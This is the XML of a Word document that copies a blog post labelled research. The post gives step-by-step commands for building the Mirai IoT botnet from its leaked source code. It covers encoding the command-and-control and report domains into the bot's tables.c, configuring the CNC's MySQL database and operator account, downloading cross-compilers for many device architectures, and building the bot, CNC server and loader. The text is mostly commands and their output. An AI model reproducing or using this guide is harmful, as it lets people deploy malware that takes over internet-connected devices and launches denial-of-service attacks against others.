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2F8" w:rsidRPr="000332F8" w:rsidRDefault="000332F8" w:rsidP="000332F8">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="150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8"/>
          <w:szCs w:val="48"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000332F8">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:kern w:val="36"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
        <w:t>Build Mirai botnet (I): Compile Mirai Source</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000332F8" w:rsidRPr="000332F8" w:rsidRDefault="000332F8" w:rsidP="000332F8">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="150"/>
        <w:jc w:val="right"/>
        <w:outlineLvl w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:kern w:val="36"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000332F8">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="777777"/>
          <w:kern w:val="36"/>
          <w:sz w:val="31"/>
          <w:szCs w:val="31"/>
        </w:rPr>
        <w:t>[Research]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000332F8" w:rsidRPr="000332F8" w:rsidRDefault="000332F8" w:rsidP="000332F8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332F8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2016-11-04 19:02:04</w:t>
      </w:r>
      <w:r w:rsidRPr="000332F8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 w:rsidRPr="000332F8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cdxy</w:t>
      </w:r>
      <w:r w:rsidRPr="000332F8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 w:rsidRPr="000332F8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Mirai,botnet,malware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An installation guide has been given by Mirai's author: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hyperlink r:id="rId6" w:history="1">
        <w:r w:rsidRPr="000332F8">
          <w:rPr>
            <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体" w:hint="eastAsia"/>
            <w:color w:val="337AB7"/>
            <w:kern w:val="0"/>
            <w:sz w:val="23"/>
            <w:szCs w:val="23"/>
          </w:rPr>
          <w:t>https://github.com/jgamblin/Mirai-Source-Code/blob/master/ForumPost.md</w:t>
        </w:r>
      </w:hyperlink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Here provides detailed installation commands.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000332F8" w:rsidRPr="000332F8" w:rsidRDefault="000332F8" w:rsidP="000332F8">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="360" w:after="360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</w:pPr>
      <w:r w:rsidRPr="000332F8"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  <w:t>Install requirements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apt-get install git gcc golang electric-fence mysql-server mysql-client</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000332F8" w:rsidRPr="000332F8" w:rsidRDefault="000332F8" w:rsidP="000332F8">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="360" w:after="360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</w:pPr>
      <w:r w:rsidRPr="000332F8"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  <w:t>Download source code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git clone https://github.com/jgamblin/Mirai-Source-Code</w:t>
      </w:r>
      <w:r w:rsidRPr="000332F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</w:t>
      </w:r>
      <w:r w:rsidRPr="000332F8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cd Mirai-Source-Code</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000332F8" w:rsidRPr="000332F8" w:rsidRDefault="000332F8" w:rsidP="000332F8">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="360" w:after="360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</w:pPr>
      <w:r w:rsidRPr="000332F8"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  <w:t>Compile encrypt-script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cd mirai/tools &amp;&amp; gcc enc.c -o enc.out</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000332F8" w:rsidRPr="000332F8" w:rsidRDefault="000332F8" w:rsidP="000332F8">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="360" w:after="360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</w:pPr>
      <w:r w:rsidRPr="000332F8"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  <w:lastRenderedPageBreak/>
        <w:t>Encrypt your cnc-domain and report-domain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./enc.out string cnc.mirai.com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>xy@kali:~/Desktop/Mirai-Source-Code-master/mirai/tools$ ./enc.out string cnc.mirai.com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>XOR'ing 14 bytes of data...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>\x41\x4C\x41\x0C\x4F\x4B\x50\x43\x4B\x0C\x41\x4D\x4F\x22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./enc.out string report.mirai.com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>xy@kali:~/Desktop/Mirai-Source-Code-master/mirai/tools$ ./enc.out string report.mirai.com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>XOR'ing 17 bytes of data...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>\x50\x47\x52\x4D\x50\x56\x0C\x4F\x4B\x50\x43\x4B\x0C\x41\x4D\x4F\x22</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000332F8" w:rsidRPr="000332F8" w:rsidRDefault="000332F8" w:rsidP="000332F8">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="360" w:after="360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</w:pPr>
      <w:r w:rsidRPr="000332F8"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  <w:t>Configuring bot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edit file "tables.c"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vi ../bot/tables.c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change string in line 18,line 21 to your encrypted domain string.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>void table_init(void)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>{   // change below 4 lines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add_entry(TABLE_CNC_DOMAIN, "\x41\x4C\x41\x0C\x4F\x4B\x50\x43\x4B\x0C\x41\x4D\x4F\x22", 30); //cnc.mirai.com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add_entry(TABLE_CNC_PORT, "\x22\x35", 2);   // 23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add_entry(TABLE_SCAN_CB_DOMAIN, "\x50\x47\x52\x4D\x50\x56\x0C\x4F\x4B\x50\x43\x4B\x0C\x41\x4D\x4F\x22", 29); // report.mirai.com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add_entry(TABLE_SCAN_CB_PORT, "\x99\xC7", 2);         // 48101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0332F8" w:rsidRPr="000332F8" w:rsidRDefault="000332F8" w:rsidP="000332F8">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="360" w:after="360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</w:pPr>
      <w:r w:rsidRPr="000332F8"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  <w:t>Configuring CNC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cd ../../scripts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edit file "db.sql"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vi db.sql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add string "use mirai;" in line 2, after "CREATE DATABASE mirai;"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>CREATE DATABASE mirai;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>use mirai;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>CREATE TABLE `history` (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...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start mysql service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service mysql start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update mysql database with this script (root:root is the user &amp; pass I've set in my Mysql-server)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cat db.sql | mysql -uroot -proot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add user to mysql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mysql -uroot -proot mirai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INSERT INTO users VALUES (NULL, 'mirai-user', 'mirai-pass', 0, 0, 0, 0, -1, 1, 30, '');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exit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>xy@kali:~/Desktop/Mirai-Source-Code-master/scripts$ mysql -uroot -proot mirai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...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>mysql&gt; INSERT INTO users VALUES (NULL, 'mirai-user', 'mirai-pass', 0, 0, 0, 0, -1, 1, 30, '');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>Query OK, 1 row affected (0.06 sec)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>mysql&gt; exit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>Bye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edit file "main.go"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vi ../mirai/cnc/main.go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line 10 - line 14 set </w:t>
      </w:r>
      <w:r w:rsidRPr="000332F8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mysql user and pass</w:t>
      </w:r>
      <w:r w:rsidRPr="000332F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here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>const DatabaseAddr string   = "127.0.0.1"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>const DatabaseUser string   = "root"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>const DatabasePass string   = "root"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const DatabaseTable string  = "mirai"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000332F8" w:rsidRPr="000332F8" w:rsidRDefault="000332F8" w:rsidP="000332F8">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="360" w:after="360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</w:pPr>
      <w:r w:rsidRPr="000332F8"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  <w:t>Cross Compile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now you are in "scripts" folder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>xy@kali:~/Desktop/Mirai-Source-Code-master/scripts$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create folder at Mirai root path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cd .. &amp;&amp; mkdir cross-compile-bin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cd cross-compile-bin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run following commands to download cross-compiler (use proxy if speed is slow)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>wget https://www.uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-armv4l.tar.bz2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>wget https://www.uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-armv5l.tar.bz2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>wget https://www.uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-i586.tar.bz2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>wget https://www.uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-i686.tar.bz2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>wget https://www.uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-m68k.tar.bz2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>wget https://www.uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-mips.tar.bz2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>wget https://www.uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-mipsel.tar.bz2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wget https://www.uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-powerpc.tar.bz2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>wget https://www.uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-sh4.tar.bz2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>wget https://www.uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-sparc.tar.bz2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>wget https://www.uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-x86_64.tar.bz2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then run the script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cd ../scripts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sudo ./cross-compile.sh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type 'n' here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>Install mysql-server and mysql-client (y/n)? n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edit .bashrc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vi ~/.bashrc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add following string at bottom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>export PATH=$PATH:/etc/xcompile/armv4l/bin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>export PATH=$PATH:/etc/xcompile/armv5l/bin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>export PATH=$PATH:/etc/xcompile/armv6l/bin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>export PATH=$PATH:/etc/xcompile/i586/bin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>export PATH=$PATH:/etc/xcompile/m68k/bin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>export PATH=$PATH:/etc/xcompile/mips/bin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>export PATH=$PATH:/etc/xcompile/mipsel/bin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export PATH=$PATH:/etc/xcompile/powerpc/bin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>export PATH=$PATH:/etc/xcompile/powerpc-440fp/bin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>export PATH=$PATH:/etc/xcompile/sh4/bin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>export PATH=$PATH:/etc/xcompile/sparc/bin</w:t>
      </w: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0332F8" w:rsidRPr="000332F8" w:rsidRDefault="000332F8" w:rsidP="000332F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64" w:after="26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332F8">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>export GOPATH=$HOME/go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refresh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mkdir ~/go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source ~/.bashrc</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000332F8" w:rsidRPr="000332F8" w:rsidRDefault="000332F8" w:rsidP="000332F8">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="360" w:after="360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</w:pPr>
      <w:r w:rsidRPr="000332F8"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  <w:t>Build bot and CNC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Get golang requiremnts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go get github.com/go-sql-driver/mysql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go get github.com/mattn/go-shellwords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In mirai folder, run build.sh script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cd ../mirai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./build.sh debug telnet</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000332F8" w:rsidRPr="000332F8" w:rsidRDefault="000332F8" w:rsidP="000332F8">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="360" w:after="360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</w:pPr>
      <w:r w:rsidRPr="000332F8"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  <w:t>Build loader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cd ../loader</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000332F8" w:rsidRPr="000332F8" w:rsidRDefault="000332F8" w:rsidP="000332F8">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="264" w:after="264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332F8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./build.sh</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009E5BCF" w:rsidRPr="000332F8" w:rsidRDefault="009E5BCF">
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:sectPr w:rsidR="009E5BCF" w:rsidRPr="00033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AF7" w:rsidRDefault="00C11AF7" w:rsidP="000332F8">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="00C11AF7" w:rsidRDefault="00C11AF7" w:rsidP="00033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AF7" w:rsidRDefault="00C11AF7" w:rsidP="000332F8">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="00C11AF7" w:rsidRDefault="00C11AF7" w:rsidP="000332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51"/>
    <w:rsid w:val="000332F8"/>
    <w:rsid w:val="00480551"/>
    <w:rsid w:val="009E5BCF"/>
    <w:rsid w:val="00C1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9359F4-A31D-4023-AF84-EC1A9F22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332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332F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32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32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32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32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32F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332F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post-datetime">
    <w:name w:val="post-datetime"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="000332F8"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="apple-converted-space">
    <w:name w:val="apple-converted-space"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="000332F8"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="post-user">
    <w:name w:val="post-user"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="000332F8"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="post-tags">
    <w:name w:val="post-tags"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="000332F8"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="a5">
    <w:name w:val="Normal (Web)"/>
    <w:basedOn w:val="a"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="000332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332F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332F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332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332F8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332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6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265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  <w:divsChild>
            <w:div w:id="17808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0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gamblin/Mirai-Source-Code/blob/master/ForumPost.m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张侨伦</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>张侨伦</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2016-12-22T10:55:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2016-12-22T10:55:00Z</dcterms:modified>
</cp:coreProperties>
</file>